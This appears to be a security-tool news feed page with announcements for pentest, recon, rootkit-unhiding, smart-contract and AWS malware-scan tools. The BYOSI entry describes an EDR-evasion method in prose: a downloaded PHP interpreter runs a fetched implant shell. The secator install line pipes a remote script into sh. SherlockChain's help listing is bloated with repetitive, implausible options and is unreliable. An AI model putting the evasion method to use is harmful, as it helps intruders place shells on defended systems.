FreshRSS

๐Ÿ”’
โŒ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayTools

Secator - The Pentester'S Swiss Knife

By: Zion3R


secator is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and it is designed to improve productivity for pentesters and security researchers.


Features

  • Curated list of commands

  • Unified input options

  • Unified output schema

  • CLI and library usage

  • Distributed options with Celery

  • Complexity from simple tasks to complex workflows

  • Customizable


Supported tools

secator integrates the following tools:

Name Description Category
httpx Fast HTTP prober. http
cariddi Fast crawler and endpoint secrets / api keys / tokens matcher. http/crawler
gau Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). http/crawler
gospider Fast web spider written in Go. http/crawler
katana Next-generation crawling and spidering framework. http/crawler
dirsearch Web path discovery. http/fuzzer
feroxbuster Simple, fast, recursive content discovery tool written in Rust. http/fuzzer
ffuf Fast web fuzzer written in Go. http/fuzzer
h8mail Email OSINT and breach hunting tool. osint
dnsx Fast and multi-purpose DNS toolkit designed for running DNS queries. recon/dns
dnsxbrute Fast and multi-purpose DNS toolkit designed for running DNS queries (bruteforce mode). recon/dns
subfinder Fast subdomain finder. recon/dns
fping Find alive hosts on local networks. recon/ip
mapcidr Expand CIDR ranges into IPs. recon/ip
naabu Fast port discovery tool. recon/port
maigret Hunt for user accounts across many websites. recon/user
gf A wrapper around grep to avoid typing common patterns. tagger
grype A vulnerability scanner for container images and filesystems. vuln/code
dalfox Powerful XSS scanning tool and parameter analyzer. vuln/http
msfconsole CLI to access and work with the Metasploit Framework. vuln/http
wpscan WordPress Security Scanner vuln/multi
nmap Vulnerability scanner using NSE scripts. vuln/multi
nuclei Fast and customisable vulnerability scanner based on simple YAML based DSL. vuln/multi
searchsploit Exploit searcher. exploit/search

Feel free to request new tools to be added by opening an issue, but please check that the tool complies with our selection criterias before doing so. If it doesn't but you still want to integrate it into secator, you can plug it in (see the dev guide).

Installation

Installing secator

Pipx
pipx install secator
Pip
pip install secator
Bash
wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh
Docker
docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help
The volume mount -v is necessary to save all secator reports to your host machine, and--net=host is recommended to grant full access to the host network. You can alias this command to run it easier:
alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"
Now you can run secator like if it was installed on baremetal:
secator --help
Docker Compose
git clone https://github.com/freelabz/secator
cd secator
docker-compose up -d
docker-compose exec secator secator --help

Note: If you chose the Bash, Docker or Docker Compose installation methods, you can skip the next sections and go straight to Usage.

Installing languages

secator uses external tools, so you might need to install languages used by those tools assuming they are not already installed on your system.

We provide utilities to install required languages if you don't manage them externally:

Go
secator install langs go
Ruby
secator install langs ruby

Installing tools

secator does not install any of the external tools it supports by default.

We provide utilities to install or update each supported tool which should work on all systems supporting apt:

All tools
secator install tools
Specific tools
secator install tools <TOOL_NAME>
For instance, to install `httpx`, use:
secator install tools httpx

Please make sure you are using the latest available versions for each tool before you run secator or you might run into parsing / formatting issues.

Installing addons

secator comes installed with the minimum amount of dependencies.

There are several addons available for secator:

worker Add support for Celery workers (see [Distributed runs with Celery](https://docs.freelabz.com/in-depth/distributed-runs-with-celery)).
secator install addons worker
google Add support for Google Drive exporter (`-o gdrive`).
secator install addons google
mongodb Add support for MongoDB driver (`-driver mongodb`).
secator install addons mongodb
redis Add support for Redis backend (Celery).
secator install addons redis
dev Add development tools like `coverage` and `flake8` required for running tests.
secator install addons dev
trace Add tracing tools like `memray` and `pyinstrument` required for tracing functions.
secator install addons trace
build Add `hatch` for building and publishing the PyPI package.
secator install addons build

Install CVEs

secator makes remote API calls to https://cve.circl.lu/ to get in-depth information about the CVEs it encounters. We provide a subcommand to download all known CVEs locally so that future lookups are made from disk instead:

secator install cves

Checking installation health

To figure out which languages or tools are installed on your system (along with their version):

secator health

Usage

secator --help


Usage examples

Run a fuzzing task (ffuf):

secator x ffuf http://testphp.vulnweb.com/FUZZ

Run a url crawl workflow:

secator w url_crawl http://testphp.vulnweb.com

Run a host scan:

secator s host mydomain.com

and more... to list all tasks / workflows / scans that you can use:

secator x --help
secator w --help
secator s --help

Learn more

To go deeper with secator, check out: * Our complete documentation * Our getting started tutorial video * Our Medium post * Follow us on social media: @freelabz on Twitter and @FreeLabz on YouTube



Imperius - Make An Linux Kernel Rootkit Visible Again

By: Zion3R


A make an LKM rootkit visible again.

This tool is part of research on LKM rootkits that will be launched.


It involves getting the memory address of a rootkit's "show_module" function, for example, and using that to call it, adding it back to lsmod, making it possible to remove an LKM rootkit.

We can obtain the function address in very simple kernels using /sys/kernel/tracing/available_filter_functions_addrs, however, it is only available from kernel 6.5x onwards.

An alternative to this is to scan the kernel memory, and later add it to lsmod again, so it can be removed.

So in summary, this LKM abuses the function of lkm rootkits that have the functionality to become visible again.

OBS: There is another trick of removing/defusing a LKM rootkit, but it will be in the research that will be launched.



BYOSI - Evade EDR's The Simple Way, By Not Touching Any Of The API's They Hook

By: Zion3R


Evade EDR's the simple way, by not touching any of the API's they hook.

Theory

I've noticed that most EDRs fail to scan scripting files, treating them merely as text files. While this might be unfortunate for them, it's an opportunity for us to profit.

Flashy methods like residing in memory or thread injection are heavily monitored. Without a binary signed by a valid Certificate Authority, execution is nearly impossible.

Enter BYOSI (Bring Your Own Scripting Interpreter). Every scripting interpreter is signed by its creator, with each certificate being valid. Testing in a live environment revealed surprising results: a highly signatured PHP script from this repository not only ran on systems monitored by CrowdStrike and Trellix but also established an external connection without triggering any EDR detections. EDRs typically overlook script files, focusing instead on binaries for implant delivery. They're configured to detect high entropy or suspicious sections in binaries, not simple scripts.

This attack method capitalizes on that oversight for significant profit. The PowerShell script's steps mirror what a developer might do when first entering an environment. Remarkably, just four lines of PowerShell code completely evade EDR detection, with Defender/AMSI also blind to it. Adding to the effectiveness, GitHub serves as a trusted deployer.


What this script does

The PowerShell script achieves EDR/AV evasion through four simple steps (technically 3):

1.) It fetches the PHP archive for Windows and extracts it into a new directory named 'php' within 'C:\Temp'.
2.) The script then proceeds to acquire the implant PHP script or shell, saving it in the same 'C:\Temp\php' directory.
3.) Following this, it executes the implant or shell, utilizing the whitelisted PHP binary (which exempts the binary from most restrictions in place that would prevent the binary from running to begin with.)

With these actions completed, congratulations: you now have an active shell on a Crowdstrike-monitored system. What's particularly amusing is that, if my memory serves me correctly, Sentinel One is unable to scan PHP file types. So, feel free to let your imagination run wild.

Disclaimer.

I am in no way responsible for the misuse of this. This issue is a major blind spot in EDR protection, i am only bringing it to everyones attention.

Thanks Section

A big thanks to @im4x5yn74x for affectionately giving it the name BYOSI, and helping with the env to test in bringing this attack method to life.

Edit

It appears as though MS Defender is now flagging the PHP script as malicious, but still fully allowing the Powershell script full execution. so, modify the PHP script.

Edit

hello sentinel one :) might want to make sure that you are making links not embed.



Ashok - A OSINT Recon Tool, A.K.A Swiss Army Knife

By: Zion3R


Reconnaissance is the first phase of penetration testing which means gathering information before any real attacks are planned So Ashok is an Incredible fast recon tool for penetration tester which is specially designed for Reconnaissance" title="Reconnaissance">Reconnaissance phase. And in Ashok-v1.1 you can find the advanced google dorker and wayback crawling machine.



Main Features

- Wayback Crawler Machine
- Google Dorking without limits
- Github Information Grabbing
- Subdomain Identifier
- Cms/Technology Detector With Custom Headers

Installation

~> git clone https://github.com/ankitdobhal/Ashok
~> cd Ashok
~> python3.7 -m pip3 install -r requirements.txt

How to use Ashok?

A detailed usage guide is available on Usage section of the Wiki.

But Some index of options is given below:

Docker

Ashok can be launched using a lightweight Python3.8-Alpine Docker image.

$ docker pull powerexploit/ashok-v1.2
$ docker container run -it powerexploit/ashok-v1.2 --help


    Credits



    X-Recon - A Utility For Detecting Webpage Inputs And Conducting XSS Scans

    By: Zion3R

    A utility for identifying web page inputs and conducting XSS scanning.


    Features:

    • Subdomain Discovery:
    • Retrieves relevant subdomains for the target website and consolidates them into a whitelist. These subdomains can be utilized during the scraping process.

    • Site-wide Link Discovery:

    • Collects all links throughout the website based on the provided whitelist and the specified max_depth.

    • Form and Input Extraction:

    • Identifies all forms and inputs found within the extracted links, generating a JSON output. This JSON output serves as a foundation for leveraging the XSS scanning capability of the tool.

    • XSS Scanning:

    • Once the start recon option returns a custom JSON containing the extracted entries, the X-Recon tool can initiate the XSS vulnerability testing process and furnish you with the desired results!



    Note:

    The scanning functionality is currently inactive on SPA (Single Page Application) web applications, and we have only tested it on websites developed with PHP, yielding remarkable results. In the future, we plan to incorporate these features into the tool.




    Note:

    This tool maintains an up-to-date list of file extensions that it skips during the exploration process. The default list includes common file types such as images, stylesheets, and scripts (".css",".js",".mp4",".zip","png",".svg",".jpeg",".webp",".jpg",".gif"). You can customize this list to better suit your needs by editing the setting.json file..

    Installation

    $ git clone https://github.com/joshkar/X-Recon
    $ cd X-Recon
    $ python3 -m pip install -r requirements.txt
    $ python3 xr.py

    Target For Test:

    You can use this address in the Get URL section

      http://testphp.vulnweb.com


    SherlockChain - A Streamlined AI Analysis Framework For Solidity, Vyper And Plutus Contracts

    By: Zion3R


    SherlockChain is a powerful smart contract analysis framework that combines the capabilities of the renowned Slither tool with advanced AI-powered features. Developed by a team of security experts and AI researchers, SherlockChain offers unparalleled insights and vulnerability detection for Solidity, Vyper and Plutus smart contracts.


    Key Features

    • Comprehensive Vulnerability Detection: SherlockChain's suite of detectors identifies a wide range of vulnerabilities, including high-impact issues like reentrancy, unprotected upgrades, and more.
    • AI-Powered Analysis: Integrated AI models enhance the accuracy and precision of vulnerability detection, providing developers with actionable insights and recommendations.
    • Seamless Integration: SherlockChain seamlessly integrates with popular development frameworks like Hardhat, Foundry, and Brownie, making it easy to incorporate into your existing workflow.
    • Intuitive Reporting: SherlockChain generates detailed reports with clear explanations and code snippets, helping developers quickly understand and address identified issues.
    • Customizable Analyses: The framework's flexible API allows users to write custom analyses and detectors, tailoring the tool to their specific needs.
    • Continuous Monitoring: SherlockChain can be integrated into your CI/CD pipeline, providing ongoing monitoring and alerting for your smart contract codebase.

    Installation

    To install SherlockChain, follow these steps:

    git clone https://github.com/0xQuantumCoder/SherlockChain.git
    cd SherlockChain
    pip install .

    AI-Powered Features

    SherlockChain's AI integration brings several advanced capabilities to the table:

    1. Intelligent Vulnerability Prioritization: AI models analyze the context and potential impact of detected vulnerabilities, providing developers with a prioritized list of issues to address.
    2. Automated Remediation Suggestions: The AI component suggests potential fixes and code modifications to address identified vulnerabilities, accelerating the remediation process.
    3. Proactive Security Auditing: SherlockChain's AI models continuously monitor your codebase, proactively identifying emerging threats and providing early warning signals.
    4. Natural Language Interaction: Users can interact with SherlockChain using natural language, allowing them to query the tool, request specific analyses, and receive detailed responses. he --help command in the SherlockChain framework provides a comprehensive overview of all the available options and features. It includes information on:

    5. Vulnerability Detection: The --detect and --exclude-detectors options allow users to specify which vulnerability detectors to run, including both built-in and AI-powered detectors.

    6. Reporting: The --report-format, --report-output, and various --report-* options control how the analysis results are reported, including the ability to generate reports in different formats (JSON, Markdown, SARIF, etc.).
    7. Filtering: The --filter-* options enable users to filter the reported issues based on severity, impact, confidence, and other criteria.
    8. AI Integration: The --ai-* options allow users to configure and control the AI-powered features of SherlockChain, such as prioritizing high-impact vulnerabilities, enabling specific AI detectors, and managing AI model configurations.
    9. Integration with Development Frameworks: Options like --truffle and --truffle-build-directory facilitate the integration of SherlockChain into popular development frameworks like Truffle.
    10. Miscellaneous Options: Additional options for compiling contracts, listing detectors, and customizing the analysis process.

    The --help command provides a detailed explanation of each option, its purpose, and how to use it, making it a valuable resource for users to quickly understand and leverage the full capabilities of the SherlockChain framework.

    Example usage:

    sherlockchain --help

    This will display the comprehensive usage guide for the SherlockChain framework, including all available options and their descriptions.

    usage: sherlockchain [-h] [--version] [--solc-remaps SOLC_REMAPS] [--solc-settings SOLC_SETTINGS]
    [--solc-version SOLC_VERSION] [--truffle] [--truffle-build-directory TRUFFLE_BUILD_DIRECTORY]
    [--truffle-config-file TRUFFLE_CONFIG_FILE] [--compile] [--list-detectors]
    [--list-detectors-info] [--detect DETECTORS] [--exclude-detectors EXCLUDE_DETECTORS]
    [--print-issues] [--json] [--markdown] [--sarif] [--text] [--zip] [--output OUTPUT]
    [--filter-paths FILTER_PATHS] [--filter-paths-exclude FILTER_PATHS_EXCLUDE]
    [--filter-contracts FILTER_CONTRACTS] [--filter-contracts-exclude FILTER_CONTRACTS_EXCLUDE]
    [--filter-severity FILTER_SEVERITY] [--filter-impact FILTER_IMPACT]
    [--filter-confidence FILTER_CONFIDENCE] [--filter-check-suicidal]
    [--filter-check-upgradeable] [--f ilter-check-erc20] [--filter-check-erc721]
    [--filter-check-reentrancy] [--filter-check-gas-optimization] [--filter-check-code-quality]
    [--filter-check-best-practices] [--filter-check-ai-detectors] [--filter-check-all]
    [--filter-check-none] [--check-all] [--check-suicidal] [--check-upgradeable]
    [--check-erc20] [--check-erc721] [--check-reentrancy] [--check-gas-optimization]
    [--check-code-quality] [--check-best-practices] [--check-ai-detectors] [--check-none]
    [--check-all-detectors] [--check-all-severity] [--check-all-impact] [--check-all-confidence]
    [--check-all-categories] [--check-all-filters] [--check-all-options] [--check-all]
    [--check-none] [--report-format {json,markdown,sarif,text,zip}] [--report-output OUTPUT]
    [--report-severity REPORT_SEVERITY] [--report-impact R EPORT_IMPACT]
    [--report-confidence REPORT_CONFIDENCE] [--report-check-suicidal]
    [--report-check-upgradeable] [--report-check-erc20] [--report-check-erc721]
    [--report-check-reentrancy] [--report-check-gas-optimization] [--report-check-code-quality]
    [--report-check-best-practices] [--report-check-ai-detectors] [--report-check-all]
    [--report-check-none] [--report-all] [--report-suicidal] [--report-upgradeable]
    [--report-erc20] [--report-erc721] [--report-reentrancy] [--report-gas-optimization]
    [--report-code-quality] [--report-best-practices] [--report-ai-detectors] [--report-none]
    [--report-all-detectors] [--report-all-severity] [--report-all-impact]
    [--report-all-confidence] [--report-all-categories] [--report-all-filters]
    [--report-all-options] [- -report-all] [--report-none] [--ai-enabled] [--ai-disabled]
    [--ai-priority-high] [--ai-priority-medium] [--ai-priority-low] [--ai-priority-all]
    [--ai-priority-none] [--ai-confidence-high] [--ai-confidence-medium] [--ai-confidence-low]
    [--ai-confidence-all] [--ai-confidence-none] [--ai-detectors-all] [--ai-detectors-none]
    [--ai-detectors-specific AI_DETECTORS_SPECIFIC] [--ai-detectors-exclude AI_DETECTORS_EXCLUDE]
    [--ai-models-path AI_MODELS_PATH] [--ai-models-update] [--ai-models-download]
    [--ai-models-list] [--ai-models-info] [--ai-models-version] [--ai-models-check]
    [--ai-models-upgrade] [--ai-models-remove] [--ai-models-clean] [--ai-models-reset]
    [--ai-models-backup] [--ai-models-restore] [--ai-models-export] [--ai-models-import]
    [--ai-models-config AI_MODELS_CONFIG] [--ai-models-config-update] [--ai-models-config-reset]
    [--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-list]
    [--ai-models-config-info] [--ai-models-config-version] [--ai-models-config-check]
    [--ai-models-config-upgrade] [--ai-models-config-remove] [--ai-models-config-clean]
    [--ai-models-config-reset] [--ai-models-config-backup] [--ai-models-config-restore]
    [--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-path AI_MODELS_CONFIG_PATH]
    [--ai-models-config-file AI_MODELS_CONFIG_FILE] [--ai-models-config-url AI_MODELS_CONFIG_URL]
    [--ai-models-config-name AI_MODELS_CONFIG_NAME] [--ai-models-config-description AI_MODELS_CONFIG_DESCRIPTION]
    [--ai-models-config-version-major AI_MODELS_CONFIG_VERSION_MAJOR]
    [--ai-models-config- version-minor AI_MODELS_CONFIG_VERSION_MINOR]
    [--ai-models-config-version-patch AI_MODELS_CONFIG_VERSION_PATCH]
    [--ai-models-config-author AI_MODELS_CONFIG_AUTHOR]
    [--ai-models-config-license AI_MODELS_CONFIG_LICENSE]
    [--ai-models-config-url-documentation AI_MODELS_CONFIG_URL_DOCUMENTATION]
    [--ai-models-config-url-source AI_MODELS_CONFIG_URL_SOURCE]
    [--ai-models-config-url-issues AI_MODELS_CONFIG_URL_ISSUES]
    [--ai-models-config-url-changelog AI_MODELS_CONFIG_URL_CHANGELOG]
    [--ai-models-config-url-support AI_MODELS_CONFIG_URL_SUPPORT]
    [--ai-models-config-url-website AI_MODELS_CONFIG_URL_WEBSITE]
    [--ai-models-config-url-logo AI_MODELS_CONFIG_URL_LOGO]
    [--ai-models-config-url-icon AI_MODELS_CONFIG_URL_ICON]
    [--ai-models-config-url-banner AI_MODELS_CONFIG_URL_BANNER]
    [--ai-models-config-url-screenshot AI_MODELS_CONFIG_URL_SCREENSHOT]
    [--ai-models-config-url-video AI_MODELS_CONFIG_URL_VIDEO]
    [--ai-models-config-url-demo AI_MODELS_CONFIG_URL_DEMO]
    [--ai-models-config-url-documentation-api AI_MODELS_CONFIG_URL_DOCUMENTATION_API]
    [--ai-models-config-url-documentation-user AI_MODELS_CONFIG_URL_DOCUMENTATION_USER]
    [--ai-models-config-url-documentation-developer AI_MODELS_CONFIG_URL_DOCUMENTATION_DEVELOPER]
    [--ai-models-config-url-documentation-faq AI_MODELS_CONFIG_URL_DOCUMENTATION_FAQ]
    [--ai-models-config-url-documentation-tutorial AI_MODELS_CONFIG_URL_DOCUMENTATION_TUTORIAL]
    [--ai-models-config-url-documentation-guide AI_MODELS_CONFIG_URL_DOCUMENTATION_GUIDE]
    [--ai-models-config-url-documentation-whitepaper AI_MODELS_CONFIG_URL_DOCUMENTATION_WHITEPAPER]
    [--ai-models-config-url-documentation-roadmap AI_MODELS_CONFIG_URL_DOCUMENTATION_ROADMAP]
    [--ai-models-config-url-documentation-blog AI_MODELS_CONFIG_URL_DOCUMENTATION_BLOG]
    [--ai-models-config-url-documentation-community AI_MODELS_CONFIG_URL_DOCUMENTATION_COMMUNITY]

    This comprehensive usage guide provides information on all the available options and features of the SherlockChain framework, including:

    • Vulnerability detection options: --detect, --exclude-detectors
    • Reporting options: --report-format, --report-output, --report-*
    • Filtering options: --filter-*
    • AI integration options: --ai-*
    • Integration with development frameworks: --truffle, --truffle-build-directory
    • Miscellaneous options: --compile, --list-detectors, --list-detectors-info

    By reviewing this comprehensive usage guide, you can quickly understand how to leverage the full capabilities of the SherlockChain framework to analyze your smart contracts and identify potential vulnerabilities. This will help you ensure the security and reliability of your DeFi protocol before deployment.

    AI-Powered Detectors

    Num Detector What it Detects Impact Confidence
    1 ai-anomaly-detection Detect anomalous code patterns using advanced AI models High High
    2 ai-vulnerability-prediction Predict potential vulnerabilities using machine learning High High
    3 ai-code-optimization Suggest code optimizations based on AI-driven analysis Medium High
    4 ai-contract-complexity Assess contract complexity and maintainability using AI Medium High
    5 ai-gas-optimization Identify gas-optimizing opportunities with AI Medium Medium
    ## Detectors
    Num Detector What it Detects Impact Confidence
    1 abiencoderv2-array Storage abiencoderv2 array High High
    2 arbitrary-send-erc20 transferFrom uses arbitrary from High High
    3 array-by-reference Modifying storage array by value High High
    4 encode-packed-collision ABI encodePacked Collision High High
    5 incorrect-shift The order of parameters in a shift instruction is incorrect. High High
    6 multiple-constructors Multiple constructor schemes High High
    7 name-reused Contract's name reused High High
    8 protected-vars Detected unprotected variables High High
    9 public-mappings-nested Public mappings with nested variables High High
    10 rtlo Right-To-Left-Override control character is used High High
    11 shadowing-state State variables shadowing High High
    12 suicidal Functions allowing anyone to destruct the contract High High
    13 uninitialized-state Uninitialized state variables High High
    14 uninitialized-storage Uninitialized storage variables High High
    15 unprotected-upgrade Unprotected upgradeable contract High High
    16 codex Use Codex to find vulnerabilities. High Low
    17 arbitrary-send-erc20-permit transferFrom uses arbitrary from with permit High Medium
    18 arbitrary-send-eth Functions that send Ether to arbitrary destinations High Medium
    19 controlled-array-length Tainted array length assignment High Medium
    20 controlled-delegatecall Controlled delegatecall destination High Medium
    21 delegatecall-loop Payable functions using delegatecall inside a loop High Medium
    22 incorrect-exp Incorrect exponentiation High Medium
    23 incorrect-return If a return is incorrectly used in assembly mode. High Medium
    24 msg-value-loop msg.value inside a loop High Medium
    25 reentrancy-eth Reentrancy vulnerabilities (theft of ethers) High Medium
    26 return-leave If a return is used instead of a leave. High Medium
    27 storage-array Signed storage integer array compiler bug High Medium
    28 unchecked-transfer Unchecked tokens transfer High Medium
    29 weak-prng Weak PRNG High Medium
    30 domain-separator-collision Detects ERC20 tokens that have a function whose signature collides with EIP-2612's DOMAIN_SEPARATOR() Medium High
    31 enum-conversion Detect dangerous enum conversion Medium High
    32 erc20-interface Incorrect ERC20 interfaces Medium High
    33 erc721-interface Incorrect ERC721 interfaces Medium High
    34 incorrect-equality Dangerous strict equalities Medium High
    35 locked-ether Contracts that lock ether Medium High
    36 mapping-deletion Deletion on mapping containing a structure Medium High
    37 shadowing-abstract State variables shadowing from abstract contracts Medium High
    38 tautological-compare Comparing a variable to itself always returns true or false, depending on comparison Medium High
    39 tautology Tautology or contradiction Medium High
    40 write-after-write Unused write Medium High
    41 boolean-cst Misuse of Boolean constant Medium Medium
    42 constant-function-asm Constant functions using assembly code Medium Medium
    43 constant-function-state Constant functions changing the state Medium Medium
    44 divide-before-multiply Imprecise arithmetic operations order Medium Medium
    45 out-of-order-retryable Out-of-order retryable transactions Medium Medium
    46 reentrancy-no-eth Reentrancy vulnerabilities (no theft of ethers) Medium Medium
    47 reused-constructor Reused base constructor Medium Medium
    48 tx-origin Dangerous usage of tx.origin Medium Medium
    49 unchecked-lowlevel Unchecked low-level calls Medium Medium
    50 unchecked-send Unchecked send Medium Medium
    51 uninitialized-local Uninitialized local variables Medium Medium
    52 unused-return Unused return values Medium Medium
    53 incorrect-modifier Modifiers that can return the default value Low High
    54 shadowing-builtin Built-in symbol shadowing Low High
    55 shadowing-local Local variables shadowing Low High
    56 uninitialized-fptr-cst Uninitialized function pointer calls in constructors Low High
    57 variable-scope Local variables used prior their declaration Low High
    58 void-cst Constructor called not implemented Low High
    59 calls-loop Multiple calls in a loop Low Medium
    60 events-access Missing Events Access Control Low Medium
    61 events-maths Missing Events Arithmetic Low Medium
    62 incorrect-unary Dangerous unary expressions Low Medium
    63 missing-zero-check Missing Zero Address Validation Low Medium
    64 reentrancy-benign Benign reentrancy vulnerabilities Low Medium
    65 reentrancy-events Reentrancy vulnerabilities leading to out-of-order Events Low Medium
    66 return-bomb A low level callee may consume all callers gas unexpectedly. Low Medium
    67 timestamp Dangerous usage of block.timestamp Low Medium
    68 assembly Assembly usage Informational High
    69 assert-state-change Assert state change Informational High
    70 boolean-equal Comparison to boolean constant Informational High
    71 cyclomatic-complexity Detects functions with high (> 11) cyclomatic complexity Informational High
    72 deprecated-standards Deprecated Solidity Standards Informational High
    73 erc20-indexed Un-indexed ERC20 event parameters Informational High
    74 function-init-state Function initializing state variables Informational High
    75 incorrect-using-for Detects using-for statement usage when no function from a given library matches a given type Informational High
    76 low-level-calls Low level calls Informational High
    77 missing-inheritance Missing inheritance Informational High
    78 naming-convention Conformity to Solidity naming conventions Informational High
    79 pragma If different pragma directives are used Informational High
    80 redundant-statements Redundant statements Informational High
    81 solc-version Incorrect Solidity version Informational High
    82 unimplemented-functions Unimplemented functions Informational High
    83 unused-import Detects unused imports Informational High
    84 unused-state Unused state variables Informational High
    85 costly-loop Costly operations in a loop Informational Medium
    86 dead-code Functions that are not used Informational Medium
    87 reentrancy-unlimited-gas Reentrancy vulnerabilities through send and transfer Informational Medium
    88 similar-names Variable names are too similar Informational Medium
    89 too-many-digits Conformance to numeric notation best practices Informational Medium
    90 cache-array-length Detects for loops that use length member of some storage array in their loop condition and don't modify it. Optimization High
    91 constable-states State variables that could be declared constant Optimization High
    92 external-function Public function that could be declared external Optimization High
    93 immutable-states State variables that could be declared immutable Optimization High
    94 var-read-using-this Contract reads its own variable using this Optimization High


    Drs-Malware-Scan - Perform File-Based Malware Scan On Your On-Prem Servers With AWS

    By: Zion3R


    Perform malware scan analysis of on-prem servers using AWS services

    Challenges with on-premises malware detection

    It can be difficult for security teams to continuously monitor all on-premises servers due to budget and resource constraints. Signature-based antivirus alone is insufficient as modern malware uses various obfuscation techniques. Server admins may lack visibility into security events across all servers historically. Determining compromised systems and safe backups to restore from during incidents is challenging without centralized monitoring and alerting. It is onerous for server admins to setup and maintain additional security tools for advanced threat detection. The rapid mean time to detect and remediate infections is critical but difficult to achieve without the right automated solution.

    Determining which backup image is safe to restore from during incidents without comprehensive threat intelligence is another hard problem. Even if backups are available, without knowing when exactly a system got compromised, it is risky to blindly restore from backups. This increases the chance of restoring malware and losing even more valuable data and systems during incident response. There is a need for an automated solution that can pinpoint the timeline of infiltration and recommend safe backups for restoration.


    How to use AWS services to address these challenges

    The solution leverages AWS Elastic Disaster Recovery (AWS DRS), Amazon GuardDuty and AWS Security Hub to address the challenges of malware detection for on-premises servers.

    This combo of services provides a cost-effective way to continuously monitor on-premises servers for malware without impacting performance. It also helps determine safe recovery point in time backups for restoration by identifying timeline of compromises through centralized threat analytics.

    • AWS Elastic Disaster Recovery (AWS DRS) minimizes downtime and data loss with fast, reliable recovery of on-premises and cloud-based applications using affordable storage, minimal compute, and point-in-time recovery.

    • Amazon GuardDuty is a threat detection service that continuously monitors your AWS accounts and workloads for malicious activity and delivers detailed security findings for visibility and remediation.

    • AWS Security Hub is a cloud security posture management (CSPM) service that performs security best practice checks, aggregates alerts, and enables automated remediation.

    Architecture

    Solution description

    The Malware Scan solution assumes on-premises servers are already being replicated with AWS DRS, and Amazon GuardDuty & AWS Security Hub are enabled. The cdk stack in this repository will only deploy the boxes labelled as DRS Malware Scan in the architecture diagram.

    1. AWS DRS is replicating source servers from the on-premises environment to AWS (or from any cloud provider for that matter). For further details about setting up AWS DRS please follow the Quick Start Guide.
    2. Amazon GuardDuty is already enabled.
    3. AWS Security Hub is already enabled.
    4. The Malware Scan solution is triggered by a Schedule Rule in Amazon EventBridge (with prefix DrsMalwareScanStack-ScheduleScanRule). You can adjust the scan frequency as needed (i.e. once a day, a week, etc).
    5. The Schedule Rule in Amazon EventBridge triggers the Submit Orders lambda function (with prefix DrsMalwareScanStack-SubmitOrders) which gathers the source servers to scan from the Source Servers DynamoDB table.
    6. Orders are placed on the SQS FIFO queue named Scan Orders (with prefix DrsMalwareScanStack-ScanOrdersfifo). The queue is used to serialize scan requests mapped to the same DRS instance, preventing a race condition.
    7. The Process Order lambda picks a malware scan order from the queue and enriches it, preparing the upcoming malware scan operation. For instance, it inserts the id of the replicating DRS instance associated to the DRS source server provided in the order. The output of Process Order are malware scan commands containing all the necessary information to invoke GuardDuty malware scan.
    8. Malware scan operations are tracked using the DRSVolumeAnnotationsDDBTable at the volume-level, providing reporting capabilities.
    9. Malware scan commands are inserted in the Scan Commands SQS FIFO queue (with prefix DrsMalwareScanStack-ScanCommandsfifo) to increase resiliency.
    10. The Process Commands function submits queued scan commands at a maximum rate of 1 command per second to avoid API throttling. It triggers the on-demand malware scan function provided by Amazon GuardDuty.
    11. The execution of the on-demand Amazon GuardDuty Malware job can be monitored from the Amazon GuardDuty service.
    12. The outcome of malware scan job is routed to Amazon Cloudwath Logs.
    13. The Subscription Filter lambda function receives the outcome of the scan and tracks the result using DynamoDB (step #14).
    14. The DRS Instance Annotations DynamoDB Table tracks the status of the malware scan job at the instance level.
    15. The CDK stack named ScanReportStack deploys the Scan Report lambda function (with prefix ScanReportStack-ScanReport) to populate the Amazon S3 bucket with prefix scanreportstack-scanreportbucket.
    16. AWS Security Hub aggregates and correlates findings from Amazon GuardDuty.
    17. The Security Hub finding event is caught by an EventBridge Rule (with prefix DrsMalwareScanStack-SecurityHubAnnotationsRule)
    18. The Security Hub Annotations lambda function (with prefix DrsMalwareScanStack-SecurityHubAnnotation) generates additional Notes (Annotations) to the Finding with contextualized information about the source server being affected. This additional information can be seen in the Notes section within the Security Hub Finding.
    19. The follow-up activities will depend on the incident response process being adopted. For example based on the date of the infection, AWS DRS can be used to perform a point in time recovery using a snapshot previous to the date of the malware infection.
    20. In a Multi-Account scenario, this solution can be deployed directly on the AWS account hosting the AWS DRS solution. The Amazon GuardDuty findings will be automatically sent to the centralized Security Account.

    Usage

    Pre-requisites

    • An AWS Account.
    • Amazon Elastic Disaster Recovery (DRS) configured, with at least 1 server source in sync. If not, please check this documentation. The Replication Configuration must consider EBS encryption using Custom Managed Key (CMK) from AWS Key Management Service (AWS KMS). Amazon GuardDuty Malware Protection does not support default AWS managed key for EBS.
    • IAM Privileges to deploy the components of this solution.
    • Amazon GuardDuty enabled. If not, please check this documentation
    • Amazon Security Hub enabled. If not, please check this documentation

      Warning
      Currently, Amazon GuardDuty Malware scan does not support EBS volumes encrypted with EBS-managed keys. If you want to use this solution to scan your on-prem (or other-cloud) servers replicated with DRS, you need to setup DRS replication with your own encryption key in KMS. If you are currently using EBS-managed keys with your replicating servers, you can change encryption settings to use your own KMS key in the DRS console.

    Deploy

    1. Create a Cloud9 environment with Ubuntu image (at least t3.small for better performance) in your AWS account. Open your Cloud9 environment and clone the code in this repository. Note: Amazon Linux 2 has node v16 which is not longer supported since 2023-09-11 git clone https://github.com/aws-samples/drs-malware-scan

      cd drs-malware-scan

      sh check_loggroup.sh

    2. Deploy the CDK stack by running the following command in the Cloud9 terminal and confirm the deployment

      npm install cdk bootstrap cdk deploy --all Note
      The solution is made of 2 stacks: * DrsMalwareScanStack: it deploys all resources needed for malware scanning feature. This stack is mandatory. If you want to deploy only this stack you can run cdk deploy DrsMalwareScanStack
      * ScanReportStack: it deploys the resources needed for reporting (Amazon Lambda and Amazon S3). This stack is optional. If you want to deploy only this stack you can run cdk deploy ScanReportStack

      If you want to deploy both stacks you can run cdk deploy --all

    Troubleshooting

    All lambda functions route logs to Amazon CloudWatch. You can verify the execution of each function by inspecting the proper CloudWatch log groups for each function, look for the /aws/lambda/DrsMalwareScanStack-* pattern.

